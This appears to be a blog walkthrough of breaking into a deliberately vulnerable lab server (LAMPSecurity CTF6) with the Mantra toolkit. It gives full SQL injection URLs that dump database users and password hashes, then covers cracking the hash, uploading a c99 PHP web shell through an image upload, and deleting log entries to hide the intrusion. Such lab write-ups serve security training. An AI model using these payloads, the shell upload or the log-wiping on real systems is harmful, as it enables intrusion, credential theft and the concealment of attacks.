Hi All,
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
![[Image: mantrahackbar1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uLbQuHhaP9GBs3rt-EuaXIigGBgqd92eXxIrjLAOx-O-YGz0fT479ZQI2tA9Ty-aS1FHq9HgV95S8nRax6pBHLIw9V8U5z-ccAWEKKnYfoOIBCqQTEjc1LT7-DoPpJSl3D9EsFolENQSjTGKfearCFS4ijxNIf_eKOrFp8jI8sU-93=s0-d)
Step 2:
I went through all the pages of web site and found a page with URL input
![[Image: mantrahackbar2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uEgLSAxzVx8SN7POkGk2u4A9y55I-UNt3zZhWLxPIUwN1yzjQmUgwnc8EYGXu_4ewv5x87skNoW4IVRj4XyhnBnZx2QTCw9bPo_IX-2o8WPRWVcGwyYwKYOkM510TLdQ17PRbCvq94HpaAFHVdPQxMvJMzaOT1Gpxz6BqPA3cIVNU5hA=s0-d)
Step 3:
I launched Hackbar by pressing F9
![[Image: mantrahackbar3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uHF1dXssIIultN-gL8T0Btwi-5xXj1rRUgVgGSavBTZII4lr90vvtisW37ZNfh-trqoPL3v-9GxN9DYAEmnYtdGjA9wcXSMCLS19c83E9VnESHe4Idy0BYReXJ1APVXf0_6drhFtiaMgymssfgCojqgBDs0m4DMqWjkW7pP6aM9nBS2g=s0-d)
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
![[Image: mantrahackbar4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sh1Y2d5oeSGbGlwFnCKntYQloxVJ_befRUgpH__Bfa6ps8TWd31Z0xZZbEFxG45Bx-BWoObnGtKUWLpiiAZxCuOwKSQ3a_7LUjt2OWIGOq0Bd7o0F1zH4JQP1eWKSff1NgbRxJc2WLk3SvJIm9zjkgL_E-9vkKuvEbe6nvz6csn9hV1Q=s0-d)
Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
![[Image: mantrahackbar6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vnbSU0-gvFd7TZM2FkMgYfHo7tkidgUA763NbAR-Ba1sc8o07bhPXJR6MCeEfm7wjyWTCxRWe4OrVyJbIvpWnlFF-e6bbW-bf7wWbUrFEFGnW2Gs-XzS_-myltKC-02WNqRzFHG77gglUoAEwNX41CKRrtTHm7ZIwRjW-T6p-LaVWR4w=s0-d)
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
![[Image: mantrahackbar7.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tFPxH0MEU6s99-utJSh5zWa7tm0semTvsIOfUNca5Bz0FkFqICIRwM-p8cd2H2L3Ytdl8WBRt9BsGnE8nu3nv9reQVQTKQJqTfJz_C9-XTz5dU0gTSYVOnangDKTq0pIuipRa4PfSMdz2FKS89cuM6KV-CjbPakdTFirJDU5xL5kwV=s0-d)
Step 7:
I went up to 7 and no change till now
![[Image: mantrahackbar12.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_unphI2dApNve-60Pxe-JdUaZXsG4RN4Xt5qiyaRVbPRfZTRIe74ktal6r1OPmrO-95eDaUYZ2ggzQEvFeWN28k5ZTnBMrbdxL4njLu-tUikOT5b-SEFIu2LbuPH8Ix2n0UENYRiYhDWHiacUaQr03FKafhxAuPsXame44kVhM20jDCm24=s0-d)
Step 8:
I'm on 8 now and I can see the page changed
![[Image: mantrahackbar13.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vWyCxWgTfN2n2s7teB5XboghbW1-48UKJfCtJXvUiJQkNCtCg6Ud3PjeNktqilDSEpC6XWmHFQRJCsm6DDHp3y2U8sVvNerEW4nIQdGjbvWvsg8gTs5xJt5RWf67noF_zszx6usEq_VZRsuXeZAuWyBDhpzX3mY8_loqdonIliWOktb5Y=s0-d)
Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
![[Image: mantrahackbar14.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uaMhn_6FGe8jrP3Y1nPiEUdPI0R53XdihSxJBJAFEEmE1QIJpsPw9N7UPQCEzWAbmx4cci0Kpp3ZHeIe0oo2lgEww5daN894H6OGU63EjeRwY2xGFX_M15CuwHQyt9y0MVt9BnEBVRcAIOxn6XPdAifiNVQeJHflgBK-HEUJv3RIY0hRo=s0-d)
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
![[Image: mantrahackbar16.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vUZ21LQ-VTU62_Rf9FbYSaURZcSz2un0lM63vpcEXRVuU0KvaDOOTQ35i9ZlqJ85_ACXyyXRSNYbnGgnvtfEcqHH-6B1ZodleiuV1ffhGmbCLmRWY-PcFCrCGjYh9YG_2Zx-hzxbMnwV0on9saGzTEaREdIvOZZQLedLWF2BkeV2G_qVE=s0-d)
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
![[Image: mantrahackbar19.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s27249v-5Jh7gxVIk2YCkMqpaiRJ3GEiGewOzV7H34Akhhq2QmGRP0V2AHwFu5TDFi56oCYYPkNp1hUf3RiVUq9nJI68LkvH4mPhiYKLcjjzDP4mSBkJHA48cMihb_lHActGmK6h7fW_xCRMpmV0k_Psgub7jLsfWsx0nU_J9KuJCsRQ=s0-d)
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
![[Image: mantrahackbar21.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_snwNmBqhe2r77DRk4OZ8karfBpkjeqcsD6a2oMcYTVsU7fPv16TQ-uCm2epBD4ovj0zRFXScOM-PBcJ64ayHU7id9vyANN4YZ49K6ns94USReZ2VuwhK4e7QMdvWfMTVXFKJNpLwbCq-JhPGX3W4zfJfnpH4Q-jaRRpBvX0-_mHQ7nkkg=s0-d)
The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
![[Image: mantrahackbar22.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sE599YnrAkzEo8ky0bpqzT4TiGgd5ujcfyuq9XaxDnaWbDSN334u8mLSTk5YUkOKHpeQqJORl0c5G-A13oxahY7Pul-gqjGQwfJ9aJ4Q3x8N4DELU3bN-P-jD27JXH4dALvCl10228F44x5lRu1-B9ZOuawYxSSfYx3DmGrrPEBspBUfo=s0-d)
5.0.45 is the version
Step 14:
Let me list all the tables
![[Image: mantrahackbar23.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vw7CdkWY26ZhdU5gi8b8Ir69sV_LVUKwxdBm15M2Lxnxgg0YHS-H6eVXRtvoaBSmQtvqVsYPDyzyLQY-23FLtlpkkOIGkEjV60ssk55z5wqMNlUpdAeoyoMsL6c5P6s0bjuUuR9TRezQoA-6Q2kFv-zcSwUCJEWFjfr6q05cNrPV2aUQ=s0-d)
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
![[Image: mantrahackbar24.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uc50vNcrDyAjP9m-RcKfXIalbxAarEZboOzV_130pQbbTv18ZT3uaH0CSu1TVtIGDEdff-Kvy4K1tclm1xP6jgPTTKGzTD60GPRc67bBCoyqE-P020MdSQnCqJaASxrbeYWVz8zuTSvPk4tK6qyFiU0_rihfIfuwqp7GkBi66YB1xxJw=s0-d)
Step 16:
I want columns from the table "user" and nothing else
![[Image: mantrahackbar25.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uNQm4OtORytn2juXzSbKgOYf9Nxjhzv6EuCI5A2cMkY3JCbQvjQTNjPSfN6EHFgAHoaP-vSHkncBMCrSPgzht_NezsIFbEU9b2u6nzB7Jbb2MZ1N3phgF2ezACGVYiuVYZB2_9yRpbtBPLF2eW_wv3EkTh5rrAtVVUMb4O9-15oNDmjUM=s0-d)
Step 17:
Lets find the user name
![[Image: mantrahackbar27.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tW7vrUj7dT7vqQ3F0cs3lyh0vdSo089X-MMufQvH4WHwqXuGr08FZQLZzxww_UmJ7EcY7A3IfpZlBdg4Ih3__8Jcdsxz0kauM38OXCv-cjybOksNxoS0lp3dzomI1TifTQ9QtktY1bsTqWEJEwSoHZu33QdQ-lnXBOpBWxSjmxAXmguEg=s0-d)
Step 18:
Now, what about password
![[Image: mantrahackbar26.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vhEAv_wuRg2mjUvns_Fftks82pztK_lFi-j5hIkMgv5kEjpXyWyFzR7d-GEUo0hqbxKDsa7DAcmbZPSzD2T7tmdseN8m37uhfn0l4y4DMRsZe_fpH9KW0W4pKvMFsLZfxRrCqTF1DDKJMFKUXr2i-9KwFpKgWU4_bIHfSnVs-7dD88ScI=s0-d)
Its encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
![[Image: mantrahackbar30.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s_9j2yutKsY27pZlCFpJJcwZOUfSKqNTl7JPBWdocfj5aQcqXimDx9zx0EdqWY-Wm4cKIsdKzrGLIMeF4o8fysYG24lNjpGsgaBOrI5XM_cgUvMYm8b-THNjhN_Q7DIyzMWZZ732F2wo_sDy7CYiy55oEa6hayC0XdlIJAg5XOuogw6_A=s0-d)
Step 20:
Voila.!!! I got the password
![[Image: mantrahackbar31.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uWf9DvbZQaJB-QNZkZQ6IRNddHvpqJTs094omKsyabsjZxcCvu19S3-90CRpQfuIbLnAAlZIcXNKJm713mv311piaKF1hfcuj-js0c82YVq7iEGYAmq0qDB3B_LCo2K_CBeyEqC16459HGqj2Uv1lyWeDqPYQlV3W5njt96UoaQsRS7FY=s0-d)
Step 21:
Finding the log in page. Its was right in front of me
![[Image: mantrahackbar32.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vZkAWzzgdtmnWw9awVpL9csVeI0BaE7j3XJBYvzB5ZJ656oTaH0hPW8GEJIu53Fn5cBWYRuLeYW1MVdaIJjLyJVzhF771_fRrSIQVY6KViM6-6xNanqZts62tCAO0NYK6FuEIozzhw4COfy2aF6c4ZsWVS49C9obnPm9CUQGU-mM1WqOo=s0-d)
Step 22:
Logging in with the credentials I have
![[Image: mantrahackbar33.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vS_-pLI3JF-0AP_29rBnJkdPeRkLqj9g4s6aLedZ8_Uo0s3Jv_U5dNOL4CRU-sFAORHbb4uvSSjMYt1MQBjBC_hwRrZMXQ2r88deEIeBJJmSH_8h6QJOr8P91rO2fNeVgLD38EEnusWGM71M74GoGH4LVhqfj-B3SrNtDPGuR_dVxGGlc=s0-d)
Step 23:
Greetings.!!!
![[Image: mantrahackbar35.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uSqPErGbP4Vq_6cskK-lFkd4KdH_rcCBGACVpWz2UM_Fgo4orWBzaK_ra6qQvRNe2HVcMlYGrDZGQEs9CNsDdOhwycsgp5q7F2DJ4I9O14KahZZJ5lpNmXvfpzQOIjhT_uts4dAWmOKmZI_2EzH8Vj_g363GeMZCGN3l7dQXmVGFbr-ZU=s0-d)
Step 24:
I'm an admin now. Look at my powers.
![[Image: mantrahackbar36.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sDNSrwD6BD8VTMYX-J5vsq94nKmlX2Vr6MRVS5eD41bWvoU236TFnU64CiAwKoldhIkRJsIisf5iWwbTNngBORdQkxpIZ2m0suED4UE4Qg5WyKWqEwk5V3jw-Q5tJIQy8ZvxowaWATYoyRA1QVIg5tnuLEFvTQAhAKP6_pIxyyAk-p47w=s0-d)
Step 25:
Let me add an event
![[Image: mantrahackbar37.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sglxSiFYSV3CRV7QvAhy5ayRVZGQYjgyo4IZz07dezTJ4wBWv8XTm5t2-XLnF-g9NWjdxgkZ29nBGW2SS7VdZ97sO3zdrDzsOs1w0tRiiH8ueqVucS481zs5epzz0hQ7HGoX4SD5TAEBUomNAsfVhtuhvHzZCZygCGJmSpgWQ7UUGdGQ=s0-d)
Step 26:
and of course I want to upload a picture
![[Image: mantrahackbar38.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t3fQAvKxBD6BAsvGfVEqeKW06a8G_AZTUGcX11UlWxq7Adt_BZ2TZUl4rd5AqUKs6gbqap5fv19gCCsALXF7rrWmivRa34xbmJkf0LD3YQa2eKo4vSveT7UVGfTntmlv-DxfLakLHG0pEcgOcWEUGqVnziTbkeIZ5lY6C9AT1bFrNopg=s0-d)
Step 27:
Lets see it allows me to upload the shell or not
![[Image: mantrahackbar39.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tRJv5D3AfQ3I1xQ0N89Jlc0ojUVNXMMNisBLarrtIT2fd7Mi7U_lDmpE_sy3EhSg4QvO1hSFb-G8rc_TWLaiOtvniuZJ9nbIq-3-hVr1M-sSBDwGwaVBIHIwOktEBExAuHwglzTENq_iLNO316g2C1tgzE9asp4xrTkKpe24IlYftuSBY=s0-d)
Step 28:
Now I'm pressing on "Add Event" button
![[Image: mantrahackbar40.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sry-Uonx9wE8ckTiepERNckpf6DRGiiPl4NUPPcRTPoX2Kjhi3Hz7Pn3fyo-ol1kJlAIoKtbhEKZTBXQkgqmlbBfFOCgceHCSUcufHqrihUAj38LCoEEymCE6rleS_9pGnBlr1gll7D736B8-7xmhSflr614RG_bzDr2wqnGVGk1AFF8o=s0-d)
Step 29:
Nice. Looks like it's got uploaded
![[Image: mantrahackbar41.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s3byTQAn0BZ-5w-scHeQv2rGqbBsz2vQ8lkMCNC5E2XZZspVHGm5P5RAS5lOftc8FBzGGHAyBIO7DzJgVYl-KpIMPZaGt3F334-AQKR7Vm9qBGon2Mh7OPEL7XD29PuVUOKGVji0BeFei_p2fiB2XUxMb3HKd2pNS3KDT4H0MqahiovQ=s0-d)
Step 30:
Let's see where the shell got uploaded to
![[Image: mantrahackbar42.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ue5osGkdUtsEmVmZ4AuldD_bAlKmQLVLbOaDXrE3fYPptrqG98scA1oQz3c-F1UTnjOIoYxjaihhO5auVAZSyNpyD5gZ0oKzvskND9P0VPRVSo7dxvT1QPBsYjsItdJwcwCuNQaRHfgLfU4TxCEmtoCAyEH3qtos5_2amNxxgWlxehtKw=s0-d)
Step 31:
I'm trying to get the default upload location
![[Image: mantrahackbar43.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sjFUn6Wly8LA5740ljorwQRSfoLLSMDZ_OgN3KkLrEPc-12wfOYzWUGZmyAJwDMtYWl5gRMLn2Q6a8GWqTRcRxMl1qIi0uCitUyWsw6ToSlCZO0OTnfbIGjP5ZN1mUPRBKFqliBfe9tXuq8KpLKy0mRDQntIQUJeKoyI_u4OwNBpEyawU=s0-d)
![[Image: mantrahackbar44.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uaoCvGEcqx4BNlulEDBYLDM2JGxU_HmMObivij31fv9RJ4GlG2x5q9YIADcoVvcBay8rGGB4LgmbAVvjTChrv2rf5JgZjEl1HEFjKqOtqWDtTJjiURGlc-AyJwSA52NIhGH1t8K_-YQ0xcKvtRCPJ7Lp--9HxBRX7VhyLIm4S4vpt-5k8=s0-d)
Step 32:
Looks like I got it
![[Image: mantrahackbar45.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sl_b8ZQIRxcB4PPeYxCOmnPz0fc5ijdzJwHcP8XyyKEU63q0ytUPn2Ylx3yZ6kdj1-AHeiQYt32-48T-A3P2zkNBRFvz6A_k2QTbp5zAZ78Z3rERiYu1fh-4Rw3SwF1pVgOeSpxOYL3FE-Si2o-xnFy0rZPRUNPMLmjkel6Vt64URURGI=s0-d)
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
![[Image: mantrahackbar46.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vn60DA-ysCWyRohIrP_AdfiRxkulyVkhqCfD_klejAhXPOQTxJpZtJ4-k71eG2SMUtQn5CLh02nRKbru86sZW1SDD6mokzfiNqJa6KipHugolxmKIhWWvwdGtPv6y5qBo6cLlbqs9PaLULpFHmUTfIPz4gsxbe8ZmidUCQIKm8Z19O6IY=s0-d)
Step 34:
I simply clicked on the up button to get the root folder
![[Image: mantrahackbar48.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tRu6ZBofHKlAiktMKBhP2AF5h1LAM9PCEIRobTwasg4AFn0Ajbt8A5TNqoK1on5E3y9jZfEa7mCSQpyGBMX5cx5givNn_-jQVk1k02dYkboLPSN3ILP-_B1Wsm2xh1JQADRHRB9ZANd5IQoF3-7Wss1Xh91Ru8z-zGE1Fri6sNG2xzQ94=s0-d)
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
![[Image: mantrahackbar49.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_trREpEJAV02fE-v-SMESyCcKNfK8ddgLlA2XfezzQmxradOWt4zkbN9kpeSGygxelerPTEfVOIpuj8aXGLOshZZecW8hdCMOD2ytyDK8wAnWoRpwQqgHb1hSz4tehZ9xQgIIOMgFpp1zL8yJyXVcJak4RqBf6JzDE3X6h7sv_fvbQ9nwk=s0-d)
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
![[Image: mantrahackbar51.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uQWaEugUM1pSWL_VPVv7Kjc6qSAe6v4fFCrnNPzTW5ZoR4DnoHVMOxpcBOqSEy7jI9GA24vrlTxfMAkQ3DkAx-PG37K3VRtT9VrhbjL9ZhR1hzNMEmaiqpvHLktuZNQI_Oa6_9RgVSp69-IsnYwLqmqRabh_73nAtd6fOkPbASYAdNKQ=s0-d)
Step 37:
Let me go back and edit the log file
![[Image: mantrahackbar52.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sE-2TLaJxhh6Qw0HJAQy1OTsDQ-jYMG6iSYsz8q9U48f9Z3eLRttOK6V1SfWUh_eIwz8NMob7xiiBBDs9wnyWawYyCnBMQRXScrSM0a3IrQ5vPYcXhLq9zOrcPiw-wktBDCFgLXW8-BA6C8WkSRPByG8cPXbZ-4hlhjSt42jiQjR2DQ-U=s0-d)
![[Image: mantrahackbar53.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v_KTU0N7E0frQUweQb9y_ltFlAjkWonnIMjHVr5irTC2CTfkRkpBgnxF_kEkDiuEoXL6XmkWpxY6-tyoI2hiSOz3NEN3auyEk8ggIYvbxJSqDOuYJS-2dZzqfzw8esiM9gT4LYzXx0K5y0W8LXpVxky3tL_yTP18REvf5akWAKEecV_g=s0-d)
Step 38:
I deleted complete log entries. Now saving it.
![[Image: mantrahackbar54.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ugycOkRrHw5M-6-i6w67LQb5gCtZ9CGnQt4U2y-kQ83LvExeGxOBWOZvkAnU6zDAln99snqsiQy6HShmsPiV5yJhz1kHEPSGig4PN-D5caahuE4a0pMvRQ9VDcEF2gNJDQRLogRaENCMNaRrNAHLSNoopADMX0qB9eILwEUTK1Vk0VowA=s0-d)
Step 39:
Nice. Log file is empty now
![[Image: mantrahackbar56.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s5mnYMpINmPAXL0y5WNkvZseJAflQZlzne6Jqrc-Ox7v5DYvieaejVOSo_SV5DszNvKASlycYEv84Cw19o0LP4K-PF2NfJvXmoxJZ0y9YDUMmEVeEz9f_hRVGsEXjpkeRNdVePMwP6y-nvzMI9w15ffBpFHsG2-xz6hBtyX-hh86y7b1s=s0-d)
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
![[Image: mantrahackbar57.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_toKf32Xsf9froCtOoZEB7c2FEuz3__xhgAZTvP0bXYy-HAq8NCmbM3zsSyjH6cdgYQpWBIPexZh7mgLWmxuNrzsRbz8TaPWNtYXrJSKuKgXoH-51eMXoP1L5fwFChd6LT0vyxkcs4mtWBz3SoPiJEjR5yyQOwUN6G4xCzZXfKSznPf_oQ=s0-d)
Step 41:
Confirmed.!!!
![[Image: mantrahackbar58.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sbFUO97CLRa9clPbwoAkHjbPi5lODyUFVQAcuSjT1TIK68x6R_-rDIWUeN4iURlDhcCn02PqkfmJd3W548GTi3f5DXaY9jz5Isak3YWGs5L6Fd_n0AoYa7wCqihQWaOppuVgCual9erU13K01HISlbrX8yVMafKimP0fZBXIbN_pCsknc=s0-d)
Step 42:
OK. Good Bye C99
![[Image: mantrahackbar59.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tB1udu6KDHR1ylWCbFz9Ab5_2klvBTCYL1UPNv5fsojron5tZMAo56bVBna1vjCq1uBZyRb1LMRBRewg0MHR7V1peGXV86avxNKrcL20120i_Wuw2KKrOnYtmsGDqSXCeUTby-fVa26W-V-joii2K50nhQnZq_ok9now4h2qcRyoO1ZA=s0-d)
Step 43:
Well. It got deleted itself
![[Image: mantrahackbar60.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v-pXuMQAmG4gS4yMhutsZNgh_VvSnPaXiyeZwWhnX4956l8-Af9_RVIJDs7EbRox87aMfyEP6LfFl-6gTh50tbqksK-gOvOQfkVy-BQi9aPG6-L-yhslIbPwD3K3R7fBOTQEqloTTEhIw5pQ0VRC8rUEIFtkhYi5xvWEARB9ObFRYt7PE=s0-d)
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
http://192.168.132.128/
Step 2:
I went through all the pages of web site and found a page with URL input
http://192.168.132.128/?id=13
Step 3:
I launched Hackbar by pressing F9
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
http://192.168.132.128/?id=13'Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
http://192.168.132.128/?id=13 order by 1Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
http://192.168.132.128/?id=13 order by 7Step 7:
I went up to 7 and no change till now
http://192.168.132.128/?id=13 order by 7Step 8:
I'm on 8 now and I can see the page changed
http://192.168.132.128/?id=13 order by 8Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,75.0.45 is the version
Step 14:
Let me list all the tables
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tablesFrom this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columnsStep 16:
I want columns from the table "user" and nothing else
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'Step 17:
Lets find the user name
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from userStep 18:
Now, what about password
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from userIts encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Step 20:
Voila.!!! I got the password
Step 21:
Finding the log in page. Its was right in front of me
Step 22:
Logging in with the credentials I have
Step 23:
Greetings.!!!
Step 24:
I'm an admin now. Look at my powers.
Step 25:
Let me add an event
Step 26:
and of course I want to upload a picture
Step 27:
Lets see it allows me to upload the shell or not
Step 28:
Now I'm pressing on "Add Event" button
Step 29:
Nice. Looks like it's got uploaded
Step 30:
Let's see where the shell got uploaded to
Step 31:
I'm trying to get the default upload location
Step 32:
Looks like I got it
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Step 34:
I simply clicked on the up button to get the root folder
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Step 37:
Let me go back and edit the log file
Step 38:
I deleted complete log entries. Now saving it.
Step 39:
Nice. Log file is empty now
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
Step 41:
Confirmed.!!!
Step 42:
OK. Good Bye C99
Step 43:
Well. It got deleted itself
H4qqy H4ck!ng
This comment has been removed by a blog administrator.
ReplyDeleteHmmmok Nice share
ReplyDelete